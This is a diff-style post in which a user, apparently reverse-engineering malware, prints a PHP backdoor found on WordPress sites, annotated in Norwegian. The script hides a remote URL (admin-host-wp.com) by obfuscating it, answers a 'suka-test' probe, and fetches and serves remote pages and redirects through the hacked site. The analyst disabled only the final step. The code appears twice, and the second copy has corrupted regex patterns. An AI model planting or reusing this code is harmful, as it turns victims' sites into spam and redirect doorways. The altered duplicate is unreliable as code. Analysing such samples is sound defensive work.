MartinIngesen · August 29, 2015 14:21
diff --git a/StormenWordpress b/StormenWordpress
 <?php
 // DISCLAIMER: I AM JUST TRYING TO REVERSE THIS CODE. I AM NOT THE CREATOR, NOR HAVE I EVER USED THIS TO EXPLOIT ANYTHING.


 // skrur av feilmeldinger.
 error_reporting(0);

 $lru = "gg/66551324912345824801528/291s293r654o358d894-4502674n550i200a383m417/539n523o433t599t860u453b488d347e322r290/806m243o771c122.808p804w934-266t284s462o458h478-117n717i372m468d391a823/568/674:241p107t197t574h606";
 $url = '';

 /**
 * Looper baklengs over $lru og henter ut hver 4de karakter. Resultatet blir lagret i $url.
 * $url = http://admin-host-wp.com/redbutton/main2-dors/12345/
 */

 if (substr($lru, 0, 2) == 'gg'){
 	for ($x = strlen($lru); $x > 0; $x-= 4)
 		$url.= substr($lru, $x, 1);
 }else{
 	$url = $lru;
 }


 $e = '.php';
 $q = "";
 $test = 'suka-test';

 /*

 (!$q || isset($_GET[$q]) er alltid lik true, da !$q alltid vil være true.

 Vi må sette $_GET[$q] eller $_SERVER["QUERY_STRING"] lik noe som passerer REGEXen. 2 random bokstaver feks fungerer fint.
 */
 if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"])){

 	// Denne delen er der nok bare for å sjekke at exploiten har blitt lastet opp. Evt automatisering.
 	$strlena = strlen($a); // lengden av $a
 	$aori = $a;
 	$a = rtrim($a, '/'); // fjern alle / på slutten av $a
 	if ($test && $a == $test){ // hvis $a er lik $test (suka-test)
 		echo 'OK';
 		exit;
 	}
 	// for å teste; gå til filnavn.php/?suka-test


 	$w = preg_replace("/^([a-z0-9-_\/]+)(\.php|\.html|\/|)$/i", '$1' . $e, $a, -1, $h);

 	echo $url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php|\.html|\/|)$/i", '$1' . $e, $a, -1, $h));


 	exit();

 	// curler http://admin-host-wp.com/redbutton/main2-dors/12345/ + det man har skrevet inn som URL parameter.
 	curl_setopt($ch = curl_init($url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php|\.html|\/|)$/i", '$1' . $e, $a, -1, $h))) , CURLOPT_RETURNTRANSFER, 1);
 	curl_setopt($ch, CURLOPT_HEADER, 0);
 	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
 	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
 	if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
 	$result = curl_exec($ch);
 	if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 || $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)))
 		{
 		$end = FALSE;
 		$rd = $u;
 		while ($end === FALSE)
 			{
 			curl_setopt($cht = curl_init($rd) , CURLOPT_RETURNTRANSFER, 1);
 			curl_setopt($cht, CURLOPT_HEADER, 1);
 			curl_setopt($cht, CURLOPT_FOLLOWLOCATION, 0);
 			curl_setopt($cht, CURLOPT_USERAGENT, 'Opera');
 			curl_setopt($cht, CURLOPT_REFERER, 'http://www.google.com');
 			$rrt = curl_exec($cht);
 			$u = curl_getinfo($cht, CURLINFO_EFFECTIVE_URL);
 			if (preg_match('#Location\: ([\S]+)#si', $rrt, $rdr))
 				{
 				$rd = $rdr[1];
 				if (!preg_match('#redbutton#', $rd))
 					{
 					$end = TRUE;
 					break;
 					}
 				}
 			  else
 				{
 				$end = TRUE;
 				break;
 				}
 			}

 		header('Location: ' . $rd, true, $c);
 		exit;
 		}
 	  else
 	if ($c == 200 && $result)
 		{
 		header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));
 		$result = preg_replace('#^.*?\<html#si', '<html', $result);
 		$ori = $result;
 		$t = $_SERVER["SCRIPT_NAME"];
 		$h = strlen($w) - strlen($e) - $strlena;
 		$result = preg_replace('/background(-image\\(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result);
 		$hz = ($h < 0) ? substr($a, $h) : "";
 		if (substr($aori, -1) == '/')
 			{
 			$result = preg_replace('/<(a|link|img)(.*?)(href|src)=["\']((?!http|\/)[a-z0-9-_\.\/\?\=]+)["\'](.*?)>/i', '<$1$2$3="../$4"$5>', $result);
 			}

 		$result = (($h) || substr($a, -4) == '.css') ? preg_replace('/<a(.*?)href=["\'](' . preg_quote($t, '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)>/i', '<a$1href="$2' . $hz . '"$4>', $result) : $ori;
 		if (strpos($_SERVER['REQUEST_URI'], 'index.php?') !== FALSE)
 			{
 			$result = preg_replace('/<(link|img)(.*?)(href|src)=["\']((?!http|\/)[a-z0-9-_\.\/\=]+).*?["\'](.*?)>/i', '<$1$2$3="index.php?$4"$5>', $result);
 			}

 		echo $result;
 		exit;
 		}
 	}
	<?php
	// DISCLAIMER: I AM JUST TRYING TO REVERSE THIS CODE. I AM NOT THE CREATOR, NOR HAVE I EVER USED THIS TO EXPLOIT ANYTHING.


	// skrur av feilmeldinger.
	error_reporting(0);

	$lru = "gg/66551324912345824801528/291s293r654o358d894-4502674n550i200a383m417/539n523o433t599t860u453b488d347e322r290/806m243o771c122.808p804w934-266t284s462o458h478-117n717i372m468d391a823/568/674:241p107t197t574h606";
	$url = '';

	/**
	* Looper baklengs over $lru og henter ut hver 4de karakter. Resultatet blir lagret i $url.
	* $url = http://admin-host-wp.com/redbutton/main2-dors/12345/
	*/

	if (substr($lru, 0, 2) == 'gg'){
	for ($x = strlen($lru); $x > 0; $x-= 4)
	$url.= substr($lru, $x, 1);
	}else{
	$url = $lru;
	}


	$e = '.php';
	$q = "";
	$test = 'suka-test';

	/*

	(!$q \|\| isset($_GET[$q]) er alltid lik true, da !$q alltid vil være true.

	Vi må sette $_GET[$q] eller $_SERVER["QUERY_STRING"] lik noe som passerer REGEXen. 2 random bokstaver feks fungerer fint.
	*/
	if ((!$q \|\| isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"])){

	// Denne delen er der nok bare for å sjekke at exploiten har blitt lastet opp. Evt automatisering.
	$strlena = strlen($a); // lengden av $a
	$aori = $a;
	$a = rtrim($a, '/'); // fjern alle / på slutten av $a
	if ($test && $a == $test){ // hvis $a er lik $test (suka-test)
	echo 'OK';
	exit;
	}
	// for å teste; gå til filnavn.php/?suka-test


	$w = preg_replace("/^([a-z0-9-_\/]+)(\.php\|\.html\|\/\|)$/i", '$1' . $e, $a, -1, $h);

	echo $url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php\|\.html\|\/\|)$/i", '$1' . $e, $a, -1, $h));


	exit();

	// curler http://admin-host-wp.com/redbutton/main2-dors/12345/ + det man har skrevet inn som URL parameter.
	curl_setopt($ch = curl_init($url . ($w = preg_replace("/^([a-z0-9-_\/]+)(\.php\|\.html\|\/\|)$/i", '$1' . $e, $a, -1, $h))) , CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($ch, CURLOPT_HEADER, 0);
	curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
	if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
	$result = curl_exec($ch);
	if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 \|\| $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL)))
	{
	$end = FALSE;
	$rd = $u;
	while ($end === FALSE)
	{
	curl_setopt($cht = curl_init($rd) , CURLOPT_RETURNTRANSFER, 1);
	curl_setopt($cht, CURLOPT_HEADER, 1);
	curl_setopt($cht, CURLOPT_FOLLOWLOCATION, 0);
	curl_setopt($cht, CURLOPT_USERAGENT, 'Opera');
	curl_setopt($cht, CURLOPT_REFERER, 'http://www.google.com');
	$rrt = curl_exec($cht);
	$u = curl_getinfo($cht, CURLINFO_EFFECTIVE_URL);
	if (preg_match('#Location\: ([\S]+)#si', $rrt, $rdr))
	{
	$rd = $rdr[1];
	if (!preg_match('#redbutton#', $rd))
	{
	$end = TRUE;
	break;
	}
	}
	else
	{
	$end = TRUE;
	break;
	}
	}

	header('Location: ' . $rd, true, $c);
	exit;
	}
	else
	if ($c == 200 && $result)
	{
	header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));
	$result = preg_replace('#^.*?\<html#si', '<html', $result);
	$ori = $result;
	$t = $_SERVER["SCRIPT_NAME"];
	$h = strlen($w) - strlen($e) - $strlena;
	$result = preg_replace('/background(-image\\(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result);
	$hz = ($h < 0) ? substr($a, $h) : "";
	if (substr($aori, -1) == '/')
	{
	$result = preg_replace('/<(a\|link\|img)(.?)(href\|src)=["\']((?!http\|\/)[a-z0-9-_\.\/\?\=]+)["\'](.?)>/i', '<$1$2$3="../$4"$5>', $result);
	}

	$result = (($h) \|\| substr($a, -4) == '.css') ? preg_replace('/<a(.?)href=["\'](' . preg_quote($t, '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.?)>/i', '<a$1href="$2' . $hz . '"$4>', $result) : $ori;
	if (strpos($_SERVER['REQUEST_URI'], 'index.php?') !== FALSE)
	{
	$result = preg_replace('/<(link\|img)(.?)(href\|src)=["\']((?!http\|\/)[a-z0-9-_\.\/\=]+).?["\'](.*?)>/i', '<$1$2$3="index.php?$4"$5>', $result);
	}

	echo $result;
	exit;
	}
	}